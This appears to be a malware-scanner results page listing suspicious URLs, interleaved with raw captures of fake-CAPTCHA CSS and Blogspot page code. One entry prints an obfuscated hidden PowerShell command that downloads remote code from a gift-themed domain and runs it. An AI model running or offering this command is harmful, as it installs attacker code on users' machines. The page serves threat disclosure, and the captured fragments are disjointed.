width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
http://82.146.62.232/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
http://101.32.40.22/
Total findings: 4
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
https://staplebrokenmetaliyro.blogspot.com/
Total findings: 46
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDXbtY.ttf)format('truetype');}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:normal;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAj-lg.ttf)format('truetype');}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:normal;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWubEbVmUiA8.ttf)format('truetype');}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:normal;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWuYjalmUiA8.ttf)format('truetype');}</style>\n<style id='page-skin-1' type='text/css'><!--\n/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 
.centered{\nbox-sizing:border-box;\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-box-orient:vertical;\n-webkit-box-direction:normal;\n-webkit-flex-direction:column;\n-ms-flex-direction:column;\nflex-direction:column;\nmargin:0 auto;\nmax-width:922px;\nmin-height:100vh;\npadding:24px 0\n}\n.page_body .centered>*{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.page_body .centered>#footer{\nmargin-top:auto\n}\n.blog-name{\nmargin:24px 0 16px 0\n}\n.item-view .blog-name,.sticky .blog-name{\nbox-sizing:border-box;\nmargin-left:36px;\nmin-height:48px;\nopacity:1;\npadding-top:12px\n}\n.blog-name .subscribe-section-container{\nmargin-bottom:32px;\ntext-align:center;\n-webkit-transition-property:opacity;\ntransition-property:opacity;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s\n}\n.item-view .blog-name .subscribe-section-container,.sticky .blog-name .subscribe-section-container{\nmargin:0 0 8px 0\n}\n.blog-name .PageList{\nmargin-top:16px;\npadding-top:8px;\ntext-align:center\n}\n.blog-name .PageList .overflowable-contents{\nwidth:100%\n}\n.blog-name .PageList h3.title{\ncolor:#ffffff;\nmargin:8px auto;\ntext-align:center;\nwidth:100%\n}\n.centered-top-container .blog-name{\n-webkit-transition-property:opacity;\ntransition-property:opacity;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s\n}\n.item-view .return_link{\nmargin-bottom:12px;\nmargin-top:12px;\nposition:absolute\n}\n.item-view .blog-name{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-flex-wrap:wrap;\n-ms-flex-wrap:wrap;\nflex-wrap:wrap;\nmargin:0 48px 27px 48px\n}\n.item-view .subscribe-section-container{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.item-view #header,.item-view .Header{\nmargin-bottom:5px;\nmargin-right:15px\n}\n.item-view .sticky .Header{\nmargin-bottom:0\n}\n.item-view .Header p{\nmargin:10px 0 0 
0;\ntext-align:left\n}\n.item-view .post-share-buttons-bottom{\nmargin-right:16px\n}\n.sticky{\nbackground:#ffffff;\nbox-shadow:0 0 20px 0 rgba(0,0,0,.7);\nbox-sizing:border-box;\nmargin-left:0\n}\n.sticky #header{\nmargin-bottom:8px;\nmargin-right:8px\n}\n.sticky .centered-top{\nmargin:4px auto;\nmax-width:890px;\nmin-height:48px\n}\n.sticky .blog-name{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nmargin:0 48px\n}\n.sticky .blog-name #header{\n-webkit-box-flex:0;\n-webkit-flex:0 1 auto;\n-ms-flex:0 1 auto;\nflex:0 1 auto;\n-webkit-box-ordinal-group:2;\n-webkit-order:1;\n-ms-flex-order:1;\norder:1;\noverflow:hidden\n}\n.sticky .blog-name .subscribe-section-container{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-box-ordinal-group:3;\n-webkit-order:2;\n-ms-flex-order:2;\norder:2\n}\n.sticky .Header h1{\noverflow:hidden;\ntext-overflow:ellipsis;\nwhite-space:nowrap;\nmargin-right:-10px;\nmargin-bottom:-10px;\npadding-right:10px;\npadding-bottom:10px\n}\n.sticky .Header p{\ndisplay:none\n}\n.sticky .PageList{\ndisplay:none\n}\n.search-focused>*{\nvisibility:visible\n}\n.search-focused .hamburger-menu{\nvisibility:visible\n}\n.item-view .search-focused .blog-name,.sticky .search-focused .blog-name{\nopacity:0\n}\n.centered-bottom,.centered-top-container,.centered-top-placeholder{\npadding:0 16px\n}\n.centered-top{\nposition:relative\n}\n.item-view .centered-top.search-focused .subscribe-section-container,.sticky .centered-top.search-focused .subscribe-section-container{\nopacity:0\n}\n.page_body.has-vertical-ads .centered .centered-bottom{\ndisplay:inline-block;\nwidth:calc(100% - 176px)\n}\n.Header h1{\ncolor:#ffffff;\nfont:bold 45px Roboto, sans-serif;\nline-height:normal;\nmargin:0 0 13px 0;\ntext-align:center;\nwidth:100%\n}\n.Header h1 a,.Header h1 a:hover,.Header h1 a:visited{\ncolor:#ffffff\n}\n.item-view .Header h1,.sticky .Header 
h1{\nfont-size:24px;\nline-height:24px;\nmargin:0;\ntext-align:left\n}\n.sticky .Header h1{\ncolor:#757575\n}\n.sticky .Header h1 a,.sticky .Header h1 a:hover,.sticky .Header h1 a:visited{\ncolor:#757575\n}\n.Header p{\ncolor:#ffffff;\nmargin:0 0 13px 0;\nopacity:.8;\ntext-align:center\n}\n.widget .title{\nline-height:28px\n}\n.BlogArchive li{\nfont-size:16px\n}\n.BlogArchive .post-count{\ncolor:#757575\n}\n#page_body .FeaturedPost,.Blog .blog-posts .post-outer-container{\nbackground:#ffffff;\nmin-height:40px;\npadding:30px 40px;\nwidth:auto\n}\n.Blog .blog-posts .post-outer-container:last-child{\nmargin-bottom:0\n}\n.Blog .blog-posts .post-outer-container .post-outer{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.post-outer-container{\nmargin-bottom:16px\n}\n.post:first-child{\nmargin-top:0\n}\n.post .thumb{\nfloat:left;\nheight:20%;\nwidth:20%\n}\n.post-share-buttons-bottom,.post-share-buttons-top{\nfloat:right\n}\n.post-share-buttons-bottom{\nmargin-right:24px\n}\n.post-footer,.post-header{\nclear:left;\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0;\nwidth:inherit\n}\n.blog-pager{\ntext-align:center\n}\n.blog-pager a{\ncolor:#2196f3\n}\n.blog-pager a:visited{\ncolor:#2196f3\n}\n.blog-pager a:hover{\ncolor:#2196f3\n}\n.post-title{\nfont:bold 22px Roboto, sans-serif;\nfloat:left;\nmargin:0 0 8px 0;\nmax-width:calc(100% - 48px)\n}\n.post-title a{\nfont:bold 30px Roboto, sans-serif\n}\n.post-title,.post-title a,.post-title a:hover,.post-title a:visited{\ncolor:#212121\n}\n.post-body{\ncolor:#757575;\nfont:15px Roboto, sans-serif;\nline-height:1.6em;\nmargin:1.5em 0 2em 0;\ndisplay:block\n}\n.post-body img{\nheight:inherit\n}\n.post-body .snippet-thumbnail{\nfloat:left;\nmargin:0;\nmargin-right:2em;\nmax-height:128px;\nmax-width:128px\n}\n.post-body .snippet-thumbnail img{\nmax-width:100%\n}\n.main .FeaturedPost .widget-content{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.FeaturedPost img{\nmargin-top:2em\n}\n.FeaturedPost 
.snippet-container{\nmargin:2em 0\n}\n.FeaturedPost .snippet-container p{\nmargin:0\n}\n.FeaturedPost .snippet-thumbnail{\nfloat:none;\nheight:auto;\nmargin-bottom:2em;\nmargin-right:0;\noverflow:hidden;\nmax-height:calc(600px + 2em);\nmax-width:100%;\ntext-align:center;\nwidth:100%\n}\n.FeaturedPost .snippet-thumbnail img{\nmax-width:100%;\nwidth:100%\n}\n.byline{\ncolor:rgba(0, 0, 0, 0.54);\ndisplay:inline-block;\nline-height:24px;\nmargin-top:8px;\nvertical-align:top\n}\n.byline.post-author:first-child{\nmargin-right:0\n}\n.byline.reactions .reactions-label{\nline-height:22px;\nvertical-align:top\n}\n.byline.post-share-buttons{\nposition:relative;\ndisplay:inline-block;\nmargin-top:0;\nwidth:100%\n}\n.byline.post-share-buttons .sharing{\nfloat:right\n}\n.flat-button.ripple:hover{\nbackground-color:rgba(33,150,243,.12)\n}\n.flat-button.ripple .splash{\nbackground-color:rgba(33,150,243,.4)\n}\na.timestamp-link,a:active.timestamp-link,a:visited.timestamp-link{\ncolor:inherit;\nfont:inherit;\ntext-decoration:inherit\n}\n.post-share-buttons{\nmargin-left:0\n}\n.clear-sharing{\nmin-height:24px\n}\n.comment-link{\ncolor:#2196f3;\nposition:relative\n}\n.comment-link .num_comments{\nmargin-left:8px;\nvertical-align:top\n}\n#comment-holder .continue{\ndisplay:none\n}\n#comment-editor{\nmargin-bottom:20px;\nmargin-top:20px\n}\n#comments .comment-form h4,#comments h3.title{\nposition:absolute;\nclip:rect(1px,1px,1px,1px);\npadding:0;\nborder:0;\nheight:1px;\nwidth:1px;\noverflow:hidden\n}\n.post-filter-message{\nbackground-color:rgba(0,0,0,.7);\ncolor:#fff;\ndisplay:table;\nmargin-bottom:16px;\nwidth:100%\n}\n.post-filter-message div{\ndisplay:table-cell;\npadding:15px 28px\n}\n.post-filter-message div:last-child{\npadding-left:0;\ntext-align:right\n}\n.post-filter-message a{\nwhite-space:nowrap\n}\n.post-filter-message .search-label,.post-filter-message .search-query{\nfont-weight:700;\ncolor:#2196f3\n}\n#blog-pager{\nmargin:2em 0\n}\n#blog-pager 
a{\ncolor:#2196f3;\nfont-size:14px\n}\n.subscribe-button{\nborder-color:#ffffff;\ncolor:#ffffff\n}\n.sticky .subscribe-button{\nborder-color:#757575;\ncolor:#757575\n}\n.tabs{\nmargin:0 auto;\npadding:0\n}\n.tabs li{\nmargin:0 8px;\nvertical-align:top\n}\n.tabs .overflow-button a,.tabs li a{\ncolor:#cccccc;\nfont:700 normal 15px Roboto, sans-serif;\nline-height:18px\n}\n.tabs .overflow-button a{\npadding:12px 8px\n}\n.overflow-popup .tabs li{\ntext-align:left\n}\n.overflow-popup li a{\ncolor:#757575;\ndisplay:block;\npadding:8px 20px\n}\n.overflow-popup li.selected a{\ncolor:#212121\n}\na.report_abuse{\nfont-weight:400\n}\n.Label li,.Label span.label-size,.byline.post-labels a{\nbackground-color:#f7f7f7;\nborder:1px solid #f7f7f7;\nborder-radius:15px;\ndisplay:inline-block;\nmargin:4px 4px 4px 0;\npadding:3px 8px\n}\n.Label a,.byline.post-labels a{\ncolor:rgba(0,0,0,0.54)\n}\n.Label ul{\nlist-style:none;\npadding:0\n}\n.PopularPosts{\nbackground-color:#eeeeee;\npadding:30px 40px\n}\n.PopularPosts .item-content{\ncolor:#757575;\nmargin-top:24px\n}\n.PopularPosts a,.PopularPosts a:hover,.PopularPosts a:visited{\ncolor:#2196f3\n}\n.PopularPosts .post-title,.PopularPosts .post-title a,.PopularPosts .post-title a:hover,.PopularPosts .post-title a:visited{\ncolor:#212121;\nfont-size:18px;\nfont-weight:700;\nline-height:24px\n}\n.PopularPosts,.PopularPosts h3.title a{\ncolor:#757575;\nfont:15px Roboto, sans-serif\n}\n.main .PopularPosts{\npadding:16px 40px\n}\n.PopularPosts h3.title{\nfont-size:14px;\nmargin:0\n}\n.PopularPosts h3.post-title{\nmargin-bottom:0\n}\n.PopularPosts .byline{\ncolor:rgba(0, 0, 0, 0.54)\n}\n.PopularPosts .jump-link{\nfloat:right;\nmargin-top:16px\n}\n.PopularPosts .post-header .byline{\nfont-size:.9em;\nfont-style:italic;\nmargin-top:6px\n}\n.PopularPosts ul{\nlist-style:none;\npadding:0;\nmargin:0\n}\n.PopularPosts .post{\npadding:20px 0\n}\n.PopularPosts .post+.post{\nborder-top:1px dashed #cccccc\n}\n.PopularPosts 
.item-thumbnail{\nfloat:left;\nmargin-right:32px\n}\n.PopularPosts .item-thumbnail img{\nheight:88px;\npadding:0;\nwidth:88px\n}\n.inline-ad{\nmargin-bottom:16px\n}\n.desktop-ad .inline-ad{\ndisplay:block\n}\n.adsbygoogle{\noverflow:hidden\n}\n.vertical-ad-container{\nfloat:right;\nmargin-right:16px;\nwidth:128px\n}\n.vertical-ad-container .AdSense+.AdSense{\nmargin-top:16px\n}\n.inline-ad-placeholder,.vertical-ad-placeholder{\nbackground:#ffffff;\nborder:1px solid #000;\nopacity:.9;\nvertical-align:middle;\ntext-align:center\n}\n.inline-ad-placeholder span,.vertical-ad-placeholder span{\nmargin-top:290px;\ndisplay:block;\ntext-transform:uppercase;\nfont-weight:700;\ncolor:#212121\n}\n.vertical-ad-placeholder{\nheight:600px\n}\n.vertical-ad-placeholder span{\nmargin-top:290px;\npadding:0 40px\n}\n.inline-ad-placeholder{\nheight:90px\n}\n.inline-ad-placeholder span{\nmargin-top:36px\n}\n.Attribution{\ncolor:#757575\n}\n.Attribution a,.Attribution a:hover,.Attribution a:visited{\ncolor:#2196f3\n}\n.Attribution svg{\nfill:#707070\n}\n.sidebar-container{\nbox-shadow:1px 1px 3px rgba(0,0,0,.1)\n}\n.sidebar-container,.sidebar-container .sidebar_bottom{\nbackground-color:#ffffff\n}\n.sidebar-container .navigation,.sidebar-container .sidebar_top_wrapper{\nbackground-color:#ffffff\n}\n.sidebar-container .sidebar_top{\noverflow:auto\n}\n.sidebar-container .sidebar_bottom{\nwidth:100%;\npadding-top:16px\n}\n.sidebar-container .widget:first-child{\npadding-top:0\n}\n.sidebar_top .widget.Profile{\npadding-bottom:16px\n}\n.widget.Profile{\nmargin:0;\nwidth:100%\n}\n.widget.Profile h2{\ndisplay:none\n}\n.widget.Profile h3.title{\ncolor:rgba(0,0,0,0.52);\nmargin:16px 32px\n}\n.widget.Profile .individual{\ntext-align:center\n}\n.widget.Profile .individual .profile-link{\npadding:1em\n}\n.widget.Profile .individual .default-avatar-wrapper .avatar-icon{\nmargin:auto\n}\n.widget.Profile .team{\nmargin-bottom:32px;\nmargin-left:32px;\nmargin-right:32px\n}\n.widget.Profile 
ul{\nlist-style:none;\npadding:0\n}\n.widget.Profile li{\nmargin:10px 0\n}\n.widget.Profile .profile-img{\nborder-radius:50%;\nfloat:none\n}\n.widget.Profile .profile-link{\ncolor:#212121;\nfont-size:.9em;\nmargin-bottom:1em;\nopacity:.87;\noverflow:hidden\n}\n.widget.Profile .profile-link.visit-profile{\nborder-style:solid;\nborder-width:1px;\nborder-radius:12px;\ncursor:pointer;\nfont-size:12px;\nfont-weight:400;\npadding:5px 20px;\ndisplay:inline-block;\nline-height:normal\n}\n.widget.Profile dd{\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0 16px\n}\n.widget.Profile location{\nmargin-bottom:1em\n}\n.widget.Profile .profile-textblock{\nfont-size:14px;\nline-height:24px;\nposition:relative\n}\nbody.sidebar-visible .page_body{\noverflow-y:scroll\n}\nbody.sidebar-visible .bg-photo-container{\noverflow-y:scroll\n}\n@media screen and (min-width:1440px){\n.sidebar-container{\nmargin-top:480px;\nmin-height:calc(100% - 480px);\noverflow:visible;\nz-index:32\n}\n.sidebar-container .sidebar_top_wrapper{\nbackground-color:#f7f7f7;\nheight:480px;\nmargin-top:-480px\n}\n.sidebar-container .sidebar_top{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nheight:480px;\n-webkit-box-orient:horizontal;\n-webkit-box-direction:normal;\n-webkit-flex-direction:row;\n-ms-flex-direction:row;\nflex-direction:row;\nmax-height:480px\n}\n.sidebar-container .sidebar_bottom{\nmax-width:284px;\nwidth:284px\n}\nbody.collapsed-header .sidebar-container{\nz-index:15\n}\n.sidebar-container .sidebar_top:empty{\ndisplay:none\n}\n.sidebar-container .sidebar_top>:only-child{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-align-self:center;\n-ms-flex-item-align:center;\nalign-self:center;\nwidth:100%\n}\n.sidebar_top_wrapper.no-items{\ndisplay:none\n}\n}\n.post-snippet.snippet-container{\nmax-height:120px\n}\n.post-snippet .snippet-item{\nline-height:24px\n}\n.post-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 
0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:#757575;\nheight:24px\n}\n.popular-posts-snippet.snippet-container{\nmax-height:72px\n}\n.popular-posts-snippet .snippet-item{\nline-height:24px\n}\n.PopularPosts .popular-posts-snippet .snippet-fade{\ncolor:#757575;\nheight:24px\n}\n.main .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#eeeeee 0,#eeeeee 20%,rgba(238, 238, 238, 0) 100%);\nbackground:linear-gradient(to left,#eeeeee 0,#eeeeee 20%,rgba(238, 238, 238, 0) 100%)\n}\n.sidebar_bottom .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%)\n}\n.profile-snippet.snippet-container{\nmax-height:192px\n}\n.has-location .profile-snippet.snippet-container{\nmax-height:144px\n}\n.profile-snippet .snippet-item{\nline-height:24px\n}\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:rgba(0, 0, 0, 0.54);\nheight:24px\n}\n@media screen and (min-width:1440px){\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%);\nbackground:linear-gradient(to left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%)\n}\n}\n@media screen and (max-width:800px){\n.blog-name{\nmargin-top:0\n}\nbody.item-view .blog-name{\nmargin:0 48px\n}\n.centered-bottom{\npadding:8px\n}\nbody.item-view .centered-bottom{\npadding:0\n}\n.page_body .centered{\npadding:10px 0\n}\nbody.item-view #header,body.item-view .widget.Header{\nmargin-right:0\n}\nbody.collapsed-header .centered-top-container .blog-name{\ndisplay:block\n}\nbody.collapsed-header .centered-top-container .widget.Header 
h1{\ntext-align:center\n}\n.widget.Header header{\npadding:0\n}\n.widget.Header h1{\nfont-size:24px;\nline-height:24px;\nmargin-bottom:13px\n}\nbody.item-view .widget.Header h1{\ntext-align:center\n}\nbody.item-view .widget.Header p{\ntext-align:center\n}\n.blog-name .widget.PageList{\npadding:0\n}\nbody.item-view .centered-top{\nmargin-bottom:5px\n}\n.search-action,.search-input{\nmargin-bottom:-8px\n}\n.search form{\nmargin-bottom:8px\n}\nbody.item-view .subscribe-section-container{\nmargin:5px 0 0 0;\nwidth:100%\n}\n#page_body.section div.widget.FeaturedPost,div.widget.PopularPosts{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container .post-outer{\npadding:0\n}\n.post:first-child{\nmargin:0\n}\n.post-body .snippet-thumbnail{\nmargin:0 3vw 3vw 0\n}\n.post-body .snippet-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:128px;\nmax-width:128px\n}\ndiv.widget.PopularPosts div.item-thumbnail{\nmargin:0 3vw 3vw 0\n}\ndiv.widget.PopularPosts div.item-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:88px;\nmax-width:88px\n}\n.post-title{\nline-height:1\n}\n.post-title,.post-title a{\nfont-size:20px\n}\n#page_body.section div.widget.FeaturedPost h3 a{\nfont-size:22px\n}\n.mobile-ad .inline-ad{\ndisplay:block\n}\n.page_body.has-vertical-ads .vertical-ad-container,.page_body.has-vertical-ads .vertical-ad-container ins{\ndisplay:none\n}\n.page_body.has-vertical-ads .centered .centered-bottom,.page_body.has-vertical-ads .centered .centered-top{\ndisplay:block;\nwidth:auto\n}\ndiv.post-filter-message div{\npadding:8px 16px\n}\n}\n@media screen and (min-width:1440px){\nbody{\nposition:relative\n}\nbody.item-view .blog-name{\nmargin-left:48px\n}\n.page_body{\nmargin-left:284px\n}\n.search{\nmargin-left:0\n}\n.search.focused{\nwidth:100%\n}\n.sticky{\npadding-left:284px\n}\n.hamburger-menu{\ndisplay:none\n}\nbody.collapsed-header .page_body 
.centered-top-container{\npadding-left:284px;\npadding-right:0;\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .search.focused{\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .blog-name{\nmargin-left:0\n}\nbody.collapsed-header.item-view .centered-top-container .search.focused{\nwidth:calc(100% - 50px)\n}\nbody.collapsed-header.item-view .centered-top-container .blog-name{\nmargin-left:40px\n}\n}\n\n--></style>\n<style id='template-skin-1' type='text/css'><!--\nbody#layout .hidden,\nbody#layout .invisible {\ndisplay: inherit;\n}\nbody#layout .navigation {\ndisplay: none;\n}\nbody#layout .page,\nbody#layout .sidebar_top,\nbody#layout .sidebar_bottom {\ndisplay: inline-block;\nleft: inherit;\nposition: relative;\nvertical-align: top;\n}\nbody#layout .page {\nfloat: right;\nmargin-left: 20px;\nwidth: 55%;\n}\nbody#layout .sidebar-container {\nfloat: right;\nwidth: 40%;\n}\nbody#layout .hamburger-menu {\ndisplay: none;\n}\n--></style>\n<style>\n .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw);}\n \n@media (max-width: 480px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w480);}}\n@media (max-width: 640px) and (min-width: 481px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w640);}}\n@media (max-width: 800px) and (min-width: 641px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w800);}}\n@media (max-width: 1200px) and (min-width: 801px) { .bg-photo 
{background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1200);}}\n/* Last tag covers anything over one higher than the previous max-size cap. */\n@media (min-width: 1201px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1600);}}\n </style>\n<script async='async' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script>\n<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>\n<meta name='google-adsense-platform-domain' content='blogspot.com'/>\n\n</head>\n<body class='version-1-3-3'>\n<a class='skip-navigation' href='#main' tabindex='0'>\nSkip to main content\n</a>\n<div class='page'>\n<div class='bg-photo-overlay'></div>\n<div class='bg-photo-container'>\n<div class='bg-photo'></div>\n</div>\n<div class='page_body'>\n<div class='centered'>\n<div class='centered-top-placeholder'></div>\n<header class='centered-top-container' role='banner'>\n<div class='centered-top'>\n<button class='svg-icon-24-button hamburger-menu flat-icon-button ripple'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_menu_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n<div class='search'>\n<button aria-label='Search' class='search-expand touch-icon-button'>\n<div class='flat-icon-button ripple'>\n<svg class='svg-icon-24 search-expand-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_search_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</button>\n<div class='section' id='search_top' name='Search (Top)'><div class='widget BlogSearch' data-version='2' id='BlogSearch1'>\n<h3 class='title'>\nSearch This Blog\n</h3>\n<div class='widget-content' role='search'>\n<form 
action='https://staplebrokenmetaliyro.blogspot.com/search' target='_top'>\n<div class='search-input'>\n<input aria-label='Search this blog' autocomplete='off' name='q' placeholder='Search this blog' value=''/>\n</div>\n<input class='search-action flat-button' type='submit' value='Search'/>\n</form>\n</div>\n</div></div>\n</div>\n<div class='clearboth'></div>\n<div class='blog-name container'>\n<div class='container section' id='header' name='Header'><div class='widget Header' data-version='2' id='Header1'>\n<div class='header-widget'>\n<div>\n<h1>\nstaplebrokenmetal\n</h1>\n</div>\n<p>\n</p>\n</div>\n</div></div>\n<nav role='navigation'>\n<div class='clearboth no-items section' id='page_list_top' name='Page List (Top)'>\n</div>\n</nav>\n</div>\n</div>\n</header>\n<div>\n<div class='vertical-ad-container no-items section' id='ads' name='Ads'>\n</div>\n<main class='centered-bottom' id='main' role='main' tabindex='-1'>\n<h2 class='main-heading'>Posts</h2>\n<div class='main section' id='page_body' name='Page Body'>\n<div class='widget Blog' data-version='2' id='Blog1'>\n<div class='blog-posts hfeed container'>\n<div class='post-outer-container'>\n<div class='no-posts-message'>\nThere's nothing here!\n</div>\n</div>\n</div>\n<div class='blog-posts hfeed 